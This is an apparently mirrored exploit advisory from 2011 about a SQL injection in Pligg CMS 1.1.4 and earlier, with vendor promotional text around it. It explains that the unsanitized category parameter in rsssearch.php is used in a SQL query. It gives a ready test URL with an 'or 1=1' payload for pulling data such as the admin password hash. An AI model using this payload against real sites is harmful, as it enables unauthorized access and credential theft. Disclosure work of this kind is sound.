Lucene search
+L

Pligg 1.1.4 SQL Injection

🗓️ 17 May 2011 00:00:00Reported by Null-0x00Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

An SQL Injection vulnerability found in Pligg CMS <= 1.1.4 allows unauthorized retrieval of admin password hash

Code
`# Exploit Title: Pligg <= 1.1.4 SQL injection  
# Date: 03/23/2011  
# Author: Null-0x00  
# Software Link: http://pligg.com/  
# Version: <= 1.1.4  
# Websites: zenk-security.com & hackerzvoice.net  
  
  
# Description #  
  
An SQL Injection has been found on /rsssearch.php in pligg CMS 1.1.4. Prior  
versions (works on 1.1.3) might also be vulnerables.  
  
The $_REQUEST['category'] is not sanitized properly, and is used in a SQL  
request in a WHERE clause. The resulting request can be :  
  
SELECT pligg_links.link_id AS link_id, [...] FROM pligg_links LEFT JOIN  
pligg_groups ON pligg_links.link_group_id = pligg_groups.group_id WHERE 1  
AND ( [...] AND pligg_links.link_category = 123 or 1=1)# ) AND  
pligg_links.link_status IN ('published','queued')  
  
  
# Test #  
  
To make this request happen, use this URL :  
  
http://WEBSITE/pligg/rsssearch.php?search=test&adv=1&scategory=123+or+1=1%29%23  
  
This can be used to retrieve information such as the admin's password hash,  
etc.  
  
Have a nice day, Null  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation